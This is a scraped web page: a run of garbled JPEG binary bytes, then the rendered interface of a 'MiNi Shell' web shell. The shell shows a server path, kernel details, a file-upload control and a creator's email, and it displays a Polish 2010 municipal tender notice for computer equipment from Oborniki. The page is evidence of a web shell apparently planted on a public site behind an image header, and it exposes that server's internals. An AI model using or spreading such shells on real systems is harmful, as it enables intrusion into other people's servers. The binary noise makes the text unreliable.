JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100813/219329-N-2010.html

<p class="kh_header"><b>Oborniki: Dostawa i instalacja fabrycznie nowego sprzętu komputerowego oraz oprogramowania</b><br>
<b>Numer ogłoszenia: 219329 - 2010; data zamieszczenia: 13.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oborniki, Urząd Miejski w Obornikach , ul. Piłsudskiego 76, 64-600 Oborniki, woj. wielkopolskie, tel. 061 6559100; 6559133, faks 061 6559101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oborniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i instalacja fabrycznie nowego sprzętu komputerowego oraz oprogramowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> WYKAZ I KONFIGURACJA PRZEDMIOTU ZAMÓWIENIA
MINIMALNE WYMAGANIA TECHNICZNE
1.Sprzęt komputerowy
Specyfikacja M1
Monitor LCD 20 cali - 6 sztuk
L.p.	Parametr	Wartość parametru
1.	Przekątna ekranu (nie mniejsza niż)	20 cali WIDE
2.	Technologia podświetlenia matrycy	CCFL lub LED
3.	Typ matrycy	Matowa (nie GLOSSY)
4.	Rozdzielczość nominalna (nie mniejsza niż)	1600 x 900 pikseli
5.	Kontrast minimalny	50000:1
6.	Jasność minimalna	250 cd/m2
7.	Czas reakcji matrycy (nie więcej niż)	2 ms
8.	Wielkość plamki (nie większa niż)	0,27 mm
9.	Kąt widzenia pion (min)	160 stopni
10.	Kąt widzenia poziom (min)	170 stopni
11.	Ilość wyświetlanych kolorów	16,7 mln
12.	Typ złącza video	15-stykowe D-Sub, cyfrowe złącze DVI
13.	Kolor	Zgodny z kolorem obudowy komputera
14.	Ciężar [kg] (max)	3,3 kg
15.	Głośniki wbudowane	nie
16.	Gwarancja	36 miesięcy
UWAGA! W momencie odbioru technicznego sprzętu ekrany LCD muszą być wolne od uszkodzonych pikseli.

Specyfikacja S1
Stacja robocza - 22 sztuki
Właściwość	Parametry wymagane
Procesor	Procesor klasy x86 posiadający co najmniej dwa rdzenie, taktowanie szyny systemowej nie mniej niż 1066 MHz, pojemność pamięci cache co najmniej 3MB oraz częstotliwości pracy zegara 2,93 GHz lub procesor o równoważnej wydajności według wyników testów przeprowadzonych przez Wykonawcę. W przypadku użycia przez Wykonawcę testów wydajności Zamawiający zastrzega sobie, iż w celu sprawdzenia poprawności przeprowadzonych testów Wykonawca musi dostarczyć Zamawiającemu oprogramowanie testujące, oba równoważne porównywane zestawy oraz dokładne opisy użytych testów wraz z wynikami w terminie nie dłuższym niż 3 dni od otrzymania zawiadomienia od Zamawiającego
Płyta główna	Na chipsecie rekomendowanym przez producenta procesora, zaprojektowana i wykonana przez producenta komputera.
Bios	- Możliwość wyłączenia w BIOS-ie portów USB- Możliwość wyłączenia w BIOS-ie portu szeregowego- Możliwość wyłączenia w BIOS-ie portu równoległego- Możliwość wyłączenia w BIOS-ie karty sieciowej
Pamięć	2048 MB w jednej kości, PC-2 6400 800 MHz DDR2
Gniazda pamięci RAM	Minimum dwa gniazda, w tym min. jedno wolne
Kontroler Dysku	Dwukanałowy kontroler SATA300
Dysk twardy	O pojemności minimum 320GB SerialATA II 7200rpm kompatybilny z technologią SMART III 
Sloty	Minimum 1x PCI-Express x16 (dopuszcza się sytuację gdy złącze jest od razu wykorzystane), minimum 1x PCI 2.3
Karta graficzna	Dyskretna lub zintegrowana z płytą główną z minimum 128 MB Video RAM, dopuszcza się układ korzystający z pamięci RAM.
Karta dźwiękowa	Zintegrowana z płytą główną, zgodna z High Definition (HD) Audio
Karta sieciowa	Zintegrowana 10/100/1000, obsługująca WakeOnLan. 
Wewnętrzny napęd DVD-RW	- odczyt i zapis: CD-R, CD-RW, DVD?R, DVD?RW, DVD+R Dual Layer wraz z oprogramowaniem do nagrywania płyt DVD
Porty	Minimum:1 x LPT (ECP/EPP), 1x Serial, 6 x USB 2.0 (w tym 2 z przodu obudowy), 1 x DB-15, 1 x RJ45, 1 x wejścia audio1 x wyjścia audio,1 x mikrofon2xPS/2 (klawiatura i mysz)1 x DVI (dopuszczalne w postaci adaptera do zintegrowanej karty graficznej)
Obudowa	Typu SFF(Small Form Factor). Wymiary max: 317mm x 355mm x 99mm. (szerokość x głębokość x wysokość), waga netto max. do 7,5kg.Zasilacz minimum 280W umożliwiający bezproblemową pracę komputera przy pełnym wyposażeniu w dodatkowe urządzenia podpięte poprzez porty i sloty rozszerzeń, przy pełnym obciążeniu.  Slot bezpieczeństwa umożliwiający montaż typu Kensington Microsaver Cable. Montaż i demontaż obudowy musi odbywać się beznarzędziowo.
Klawiatura, mysz	Klawiatura typu Windows pełnowymiarowa, układ typu QWERTY US, port USB. Mysz optyczna ze scroll em, minimum 400dpi, minimum dwa przyciski, port USB; Tego samego producenta, co jednostka centralna. 
System operacyjny	System operacyjny w wersji minimum Professional musi umożliwiać instalację i pracę programów dotychczas używanych przez Zamawiającego (m.in.: BeSTi, Radix w wersji SQL i DOS oraz innych.), jak również być zgodnym z wymaganiami technicznymi tych programów,Wymagana polska wersja systemu,nośnik recovery CD lub DVD umożliwiający szybką instalację systemu operacyjnego wraz z dedykowanym oprogramowaniemZamawiający wykorzystuje w swojej siedzibie Microsoft Windows XP Professional PL OEM,
Funkcje bezpieczeństwa	- obudowa musi posiadać możliwość współpracy z zabezpieczeniem antykradzieżowym typu Kensington Microsaver Cable- BIOS musi posiadać możliwość skonfigurowania hasła Power On, hasła dostępu do BIOSu, blokadę portów USB, COM i Centronics- BIOS musi umożliwiać blokadę dostępu do napędu optycznego.
Dodatkowe oprogramowanie	- Oprogramowanie producenta komputera umożliwiające aktualizację sterowników oraz podsystemu poprzez Internet;- Oprogramowanie producenta komputera, umożliwiające aktualizację oprogramowania antywirusowego oraz skanowanie dysku z poziomu podsystemu bezpieczeństwa (nie systemu operacyjnego). Konieczna jest również możliwość dostępu do Internetu z poziomu w/w podsystemu.- Oprogramowanie do nagrywania i odtwarzania DVD/CD
Atesty i certyfikaty 	- Certyfikat ISO 9001 dla producenta sprzętu na proces projektowania i  produkcji         lub   równoważny - Certyfikat  CE 
Gwarancja	36 miesięcy gwarancji na zestaw
Dokumentacja	Do komputera muszą być dołączone instrukcje obsługi i opis zainstalowanego systemu w języku polskim
UWAGI:
1.Programy wymagające aktywacji muszą być aktywowane przed dostarczeniem do Zamawiającego.
2.Gwarancja musi obejmować cały komputer, wraz ze wszystkimi elementami składowymi.
Wymagania dotyczące poszczególnych elementów zestawu podane w tabeli są wymaganiami minimalnymi.
Specyfikacja U1
UPS 700VA 230V  - 12 sztuk
L.p.	Parametr	Wartość parametru
1.	Maksymalna moc, jaką można skonfigurować na wyjściu	405W / 700 VA
2.	Zakres napięcia wejściowegow trybie podstawowym	180 - 266V
3.	Maksymalny prąd wejściowy	10A
4.	Typ akumulatora	Bezobsługowe baterie ołowiowo-kwasowe
5.	Typowy czas pełnego ładowania akumulatora	16 godzin
6.	Czas podtrzymania przy obciążeniu 200W	minimum 14 minut
7.	Znamionowa energia przepięcia	310 Dżuli
8.	Panel przedni	Diody LED wskazujące: zasilanie  z sieci energetycznej, zasilanie z akumulatora
9.	Alarm dźwiękowy	Alarm podczas pracy na baterii; alarm, gdy osiągnięto znaczny stan wyczerpania baterii; ciągły sygnał dźwiękowy w stanie przeciążenia
10.	Maksymalna wysokość 	86 mm 
11.	Maksymalna szerokość	230 mm
12.	Maksymalna głębokość	285 mm 
13.	Ciężar netto	6,8 KG
14.	Temperatura (przechowywanie)	0 - 40 °C
15.	Okres gwarancji	3 lata naprawy albo wymiana

Specyfikacja D1
Drukarka A4, laserowa, monochromatyczna - 3 sztuki
L.p.	Parametr	Wartość parametru
1.	Maksymalny rozmiar nośnika	A4
2.	Nominalna prędkość druku	25 str./min.
3.	Rozdzielczość w pionie	600 dpi
4.	Rozdzielczość w poziomie	600 dpi
5.	Normatywny cykl pracy	8000 str./mies.
6.	Złącza zewnętrzne	USB 2.0Ethernet 10/100 Mbps
7.	Gramatura papieru	60 g/m2
8.	Zainstalowana pamięć	32 MB
9.	Prędkość procesora	400 MHz
10.	Pojemność podajnika papieru	min. 250 szt.
11.	Maksymalna pojemność podajników	min. 250 szt.
12.	Druk dwustronny [dupleks]	Tak
13.	Praca w sieci [serwer wydruku]	Tak
14.	Okres gwarancji	2 lata naprawy

Specyfikacja SW1
Switch 8-portowy, zarządzalny - 2 sztuki
L.p.	Właściwości	Wymagane parametry
1.	Switch zarządzalny	Tak
2.	Metody zarządzania	Przez przeglądarkę internetową
3.	Chłodzenie urządzenia	Bez wiatraków (no fan)
4.	Liczba portów	8
5.	Typ portów	Porty typu 10/100/1000 z automatycznym wykrywaniem szybkości (10Base-T typu IEEE 802.3, 100Base-TX typu IEEE 802.3u, 1000Base-T typu IEEE 802.3ab), pełny dupleks lub półdupleks
6.	Pamięć	.	8 MB pamięci Flash.	16 MB pamięci SDRAM.	Pojemność bufora pakietów: 512 kB
7.	Opóźnienie	.	100 Mb: 3,9 ?s.	1000 Mb: 2,1 ?s
8.	Przepustowość rutowania/przełączania	16 Gb/s
9.	Przepustowość	maks. 11,9 mln p/s
10.	Komunikacja	.	Priorytet IEEE 802.1p.	Sieci VLAN IEEE 802.1Q.	IEEE 802.3ad Link Aggregation Control Protocol (LACP).	IEEE 802.3x Flow Control.	Zgodność operacyjna - RFC 1534 DHCP/BOOTP.	RFC 2030 Simple Network Time Protocol (SNTP) v4
11.	Zasilanie	.	100 - 240 V; 50/60 Hz.	Możliwość zasilania przez Power over Ethernet (PoE)
12.	Dostępność zasilania	0,5 A
13.	Zużycie energii	maks. 15 W
14.	Możliwość mocowania do podłoża	Tak
15.	Certyfikaty bezpieczeństwa	.	CSA 22.2 nr 60950; .	EN 60950/IEC 60950; .	UL 60950
16.	Zakres temperatur składowania	-40 do 70 st. C
17.	Dopuszczalna wilgotność	15 do 95 %
18.	Maksymalne wymiary	44 mm x 196 mm x 116 mm

2.	Oprogramowanie
L.p.	Nazwa programu	Opis
1.	Pakiet biurowy  - 25 licencji, Wymagane jest, aby zawierał: edytor tekstu, arkusz kalkulacyjny, program pocztowy w pełni zgodny z MS Exchange 2007, program do tworzenia i uruchamiania prezentacji, Wymagane jest, aby umożliwiał tworzenie i edycję prezentacji już wytworzonych przez Urząd Miejski w Obornikach w programach dotychczas używanych, Wymagane jest, aby pakiet miał obsługę języka VBA, Wymagane jest, aby był kompatybilny i współpracował z programami dotychczas używanymi w Urzędzie Miejskim w Obornikach, Preferowane licencjonowanie z przeznaczeniem tylko dla jednostek publicznych (pakiet zainstalowany będzie na 25 stacjach roboczych), Licencja musi umożliwiać zmianę stacji roboczej i instalację na innej, Wymagana polska wersja pakietu biurowego, Preferowane najnowsze rozwiązania, Wymagany min. 1 nośnik z wersją instalacyjną..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia warunek dotyczący wiedzy i doświadczenia tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie dostawy, tj. polegające na dostawie sprzętu komputerowego o wartości każdej z dostaw min. 60.000,00 zł netto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ponadto przedkłada:
1)Formularz ofertowy (sporządzony według wzoru stanowiącego załącznik nr 1 IDW).
2)Kosztorys ofertowy (sporządzony według  wzoru stanowiącego załącznik nr 2 IDW).
3)Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany postanowień niniejszej umowy mogą nastąpić pisemnie, za zgodą obu stron, z zastrzeżeniem ust. 2.
2.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)termin realizacji: 
a)w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mającej bezpośredni wpływ na terminowość wykonania przedmiotu umowy,
b)w przypadku wystąpienia okoliczności, których Zamawiający nie mógł przewidzieć w chwili zawierania niniejszej umowy.
2)wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
3)przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa.
3.Nie stanowi zmiany umowy:
1)zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
2)zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oborniki.pl (bip.oborniki.pl)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Obornikach ul. Marsz. J. Piłsudskiego 76, 64-600 Oborniki, Wydział Zamówień Publicznych i Pozyskiwania Funduszy pokój nr 219..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2010 godzina 09:00, miejsce: siedziba Zamawiającego - sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com